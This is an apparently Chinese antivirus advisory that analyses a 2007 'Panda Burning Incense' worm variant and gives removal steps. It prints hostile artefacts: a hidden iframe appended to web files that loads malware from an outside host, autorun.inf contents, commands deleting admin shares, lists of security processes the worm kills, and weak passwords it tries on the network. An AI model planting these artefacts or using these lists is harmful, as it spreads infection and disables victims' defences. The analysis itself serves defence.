档案编号：CISRT2007003
病毒名称：N/A（Kaspersky）
病毒别名：Worm.WhBoy.y.35328（毒霸）
病毒大小：35,328 字节
加壳方式：nPack
样本MD5：3204b209e9199b644ca76d352fbf84ec
样本SHA1：83dcd1a7f487d160d51b59782efc4c916c3255ac
 发现时间：2007.1
  更新时间：2007.1
 关联病毒：
传播方式：恶意网页、其它病毒下载，还可通过移动磁盘（如U盘）、局域网传播

    技术分析
         ==========

   又是一个熊猫烧香变种，运行后复制自身到系统目录下：
    %System%\drivers\spoclsv.exe

 

        创建启动项：

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
  "svcshare"="%System%\drivers\spoclsv.exe"

在各分区根目录生成病毒副本：
            X:\setup.exe
            X:\autorun.inf
            autorun.inf内容：
                        [AutoRun]
            OPEN=setup.exe
            shellexecute=setup.exe
            shell\Auto\command=setup.exe

            使用net share命令关闭管理共享：

            cmd.exe /c net share X$ /del /y
            cmd.exe /c net share admin$ /del /y

 

            修改“显示所有文件和文件夹”设置：

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
            "CheckedValue"=dword:00000000

 

            病毒尝试关闭安全软件相关窗口：
            天网
            防火墙
            进程
            VirusScan
            NOD32
            网镖
            杀毒
            毒霸
            瑞星
            江民
            IceSword

 

            尝试结束安全软件相关进程以及Viking病毒进程：
            Mcshield.exe
            VsTskMgr.exe
            naPrdMgr.exe
            UpdaterUI.exe
            TBMon.exe
            scan32.exe
            Ravmond.exe
            CCenter.exe

                        禁用安全软件相关服务：
            Schedule
            sharedaccess
                       FireSvc

 

            删除安全软件相关启动项：
            SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RavTask
            SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KvMonXP
            SOFTWARE\Microsoft\Windows\CurrentVersion\Run\kav

                        遍历目录修改htm/html/asp/php/jsp/aspx等网页文件，在这些文件尾部追加信息：
            <iframe src="http://www.ctv163.com/wuhan/down.htm" width="0"
            height="0" frameborder="0"> </iframe>

 

            但不修改以下目录中的网页文件：
            C:\WINDOWS
            C:\WINNT
            C:\system32
            C:\Documents and Settings
            C:\System Volume Information
            C:\Recycled
            Program Files\Windows NT
            Program Files\WindowsUpdate
            Program Files\Windows Media Player
            Program Files\Outlook Express
            Program Files\Internet Explorer
                      在访问过的目录下生成Desktop_.ini文件，内容为当前日期，如：2007-1-5   此外，病毒还会尝试删除GHO文件。

 

            病毒还尝试使用弱密码将副本以GameSetup.exe的文件名复制到局域网内其它计算机中：
            password
            qwer
            Administrator
            Guest
            admin
            Root

 

            病毒文件内含有这些信息：
            whboy
            ***武*汉*男*生*感*染*下*载*者***
            感谢艾玛,mopery对此木马的关注!~

 

            清除步骤
            ==========

            1. 结束病毒进程：
            %System%\drivers\spoclsv.exe

            2. 删除病毒文件：
            %System%\drivers\spoclsv.exe

            3. 删除病毒启动项：
            [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
            "svcshare"="%System%\drivers\spoclsv.exe"

            4. 通过分区盘符右键菜单中的“打开”进入分区根目录，删除根目录下的病毒文件：
            X:\setup.exe
            X:\autorun.inf

            5. 恢复被修改的“显示所有文件和文件夹”设置：             [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
            "CheckedValue"=dword:00000001

            6. 修复或重新安装被破坏的安全软件

            7. 恢复被修改的网页文件，可以使用某些编辑网页的工具替换被添加文字为空